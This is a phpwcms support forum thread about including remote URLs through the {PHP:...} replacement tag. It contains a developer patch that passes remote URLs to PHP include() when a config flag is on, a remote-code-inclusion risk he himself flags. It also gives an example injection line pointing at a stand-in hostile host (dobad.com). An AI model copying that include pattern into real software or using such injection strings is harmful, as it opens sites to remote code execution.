{PHP:http://www.mysite.com/index.php?id=1,5,0,0,1}: works?

Get help with installation and running phpwcms here. Please do not post bug reports or feature requests here.
User avatar
sustia
Posts: 651
Joined: Fri 2. Apr 2004, 22:29
Location: Lecce (Italy)
Contact:

{PHP:http://www.mysite.com/index.php?id=1,5,0,0,1}: works?

Post by sustia »

Hi, I have trying to put some inclusion in my home page with {PHP} replacement tag, but seems it doesn't works:

I try this code:

Code: Select all

{PHP:http://www.gabriellagramegna.it/index.php?id=1,5,0,0,1,0}
It's correct or I wrong something?
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

This does not work anymore because of security problems. But you can use something like this by creating a new php script like "myextpage.php":

<?php
//include remote URL
include ('http://www.gabriellagramegna.it/index.p ... ,5,0,0,1,0');
?>

Then use the replacement tag {PHP:myextpage.php}.

Maybe I should implement a new config var that allows remote URL based on user's choice.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
User avatar
sustia
Posts: 651
Joined: Fri 2. Apr 2004, 22:29
Location: Lecce (Italy)
Contact:

Post by sustia »

Great, it works :D

Thanks Oliver!
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

I have patched phpwcms for the new value in conf.inc.php - but test it. It might be unsecure when somebody is able to inject your install via search form field. Please test!!!

The changed source is available within some hours via CVS or change manually:

front.func.inc.php replace this function around line 1071:

Code: Select all

function include_ext_php($inc_file, $t=0) {
	// includes an external PHP script file and returns
	// the result as string from buffered include content
	$ext_php_content = '';
	
	//check if this is a local file
	if(is_file($inc_file)) {
	
		if(!$t) {
			$this_path = str_replace("\\", '/', dirname(realpath($inc_file)));
			$this_path = preg_replace('/\/$/', '', $this_path);
		
			$root_path = str_replace("\\", '/', PHPWCMS_ROOT);
			$root_path = preg_replace('/\/$/', '', $root_path);
			
			if(strpos($this_path, $root_path) === 0) $t = 1;
		}
	} else {
		
		if(!$t) {
			//if remote URL is allowed in conf.inc.php
			if(intval($GLOBALS['phpwcms']['allow_remote_URL'])) $t =1;
		}
		
	}
	
	if($t) {
		ob_start();
		include($inc_file);
		$ext_php_content = ob_get_contents();
		ob_end_clean();
	}
	
	return $ext_php_content;
}
Add the following value to your conf.inc.php:

Code: Select all

$phpwcms["allow_remote_URL"]  = 0; //0 = no remote URL in {PHP:...} replacement tag allowed, 1 = allowed
Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
User avatar
sustia
Posts: 651
Joined: Fri 2. Apr 2004, 22:29
Location: Lecce (Italy)
Contact:

Post by sustia »

Hi Oliver, the code works fine.
Oliver Georgi wrote:I have patched phpwcms for the new value in conf.inc.php - but test it. It might be unsecure when somebody is able to inject your install via search form field. Please test!!!
Oliver
You intend to say to put something like this in the search form?

Code: Select all

http://www.gabriellagramegna.it/setup/setup.php
I try to inject this, but nothing happens.
I try too to inject with the absolute path, but there's no problem.

If you intend to say something different please, tell me what :)

Thanks as always.
Angelo
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

No has nothing to do with this.

There was a security problem when you try to insert something like this in the search field {PHP:http://www.dobad.com/return_injection_code.php}

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
User avatar
sustia
Posts: 651
Joined: Fri 2. Apr 2004, 22:29
Location: Lecce (Italy)
Contact:

Post by sustia »

Well, I'm not a security expert, but I try.

I do a page with this code:

Code: Select all

SELECT * FROM `phpwcms_user` WHERE  usr_login='mylogin'
and save in a page (myinjection.php).

Then, from the search field I try this:

Code: Select all

{PHP:http://www.mysite.com/myinjection.php}
But I'm not sure that this is the right way to try.
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

It isn't but I will not post a sample here.

But if you use a current release - there isn't the problem anymore.

check what happens if you just use {PHP:jdfjdahfjadh} - after pressing search the search field should filled with "jdfjdahfjadh". If so - no security problem ;-)

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
User avatar
sustia
Posts: 651
Joined: Fri 2. Apr 2004, 22:29
Location: Lecce (Italy)
Contact:

Post by sustia »

Yes I use the current release :)
Oliver Georgi wrote: check what happens if you just use {PHP:jdfjdahfjadh} - after pressing search the search field should filled with "jdfjdahfjadh". If so - no security problem ;-)

Oliver
It's so Oliver :wink:
art777
Posts: 34
Joined: Wed 12. Nov 2003, 03:07

Post by art777 »

Oliver Georgi wrote:This does not work anymore because of security problems. But you can use something like this by creating a new php script like "myextpage.php":

<?php
//include remote URL
include ('http://www.gabriellagramegna.it/index.p ... ,5,0,0,1,0');
?>

Then use the replacement tag {PHP:myextpage.php}.

Maybe I should implement a new config var that allows remote URL based on user's choice.

Oliver
This does not work... Maybe I don't this understand... :?

I work:

1. I want have content http://info.cms.to.pl/index.php?id=1,1,0,0,1,0 in left column in "templates".
2. Make file newsy.php (in root - http://info.cms.to.pl/newsy.php )

Code: Select all

<?php 
//include remote URL 
include ('http://info.cms.to.pl/index.php?id=1,1,0,0,1,0'); 
?> 
3. In "templates - left" set:

Code: Select all

{NAV_TABLE_SIMPLE}<br><br>
{PHP:newsy.php}
4. and in left column - http://info.cms.to.pl/index.php?id=1,1,0,0,1,0

Code: Select all

Warning: main(http://info.cms.to.pl/index.php?id=1,1,0,0,1,0): failed to open stream: HTTP request failed! D_Fâ&#138;1$[7FZ7F in /home/dealer/main/pkg/cms/info/html/newsy.php on line 3

Warning: main(): Failed opening 'http://info.cms.to.pl/index.php?id=1,1,0,0,1,0' for inclusion (include_path='.:/usr/lib/php') in /home/dealer/main/pkg/cms/info/html/newsy.php on line 3
And in conf.inc.php I added:

Code: Select all

$phpwcms["allow_remote_URL"]  = 1; //0 = no remote URL in {PHP:...} replacement tag allowed, 1 = allowed

What I work wrong :cry: (phpwcms_1.1-RC4_2004-05-22 - new install)
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

1. you have to extend the function for including external php files as posted above
2. if you set allow_remote_URL it is enough to use {PHP:http://info.cms.to.pl/index.php?id=1,1,0,0,1,0}

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
art777
Posts: 34
Joined: Wed 12. Nov 2003, 03:07

Post by art777 »

I change

Code: Select all

{NAV_TABLE_SIMPLE}<br><br>
{PHP:newsy.php}
to:

Code: Select all

{NAV_TABLE_SIMPLE}<br><br>
{PHP:http://info.cms.to.pl/index.php?id=1,1,0,0,1,0}
in conf.inc.php still is:

Code: Select all

$phpwcms["allow_remote_URL"]  = 1; 
and on site is blank (left column) - http://info.cms.to.pl/index.php?id=1,0,0,1,0,0
:(
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

But did you do this:
http://www.phpwcms.de/forum/viewtopic.php?p=12808#12808

For me - it works - but it's false to include content this way because you will get double <body> and so on...

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
art777
Posts: 34
Joined: Wed 12. Nov 2003, 03:07

Post by art777 »

How to any other way insert any content (from phpwcms) into template (not to {CONTENT} )??
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

It's in preparation. But not easy possible at the moment. There was a hack for this somewhere in this forum.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
Post Reply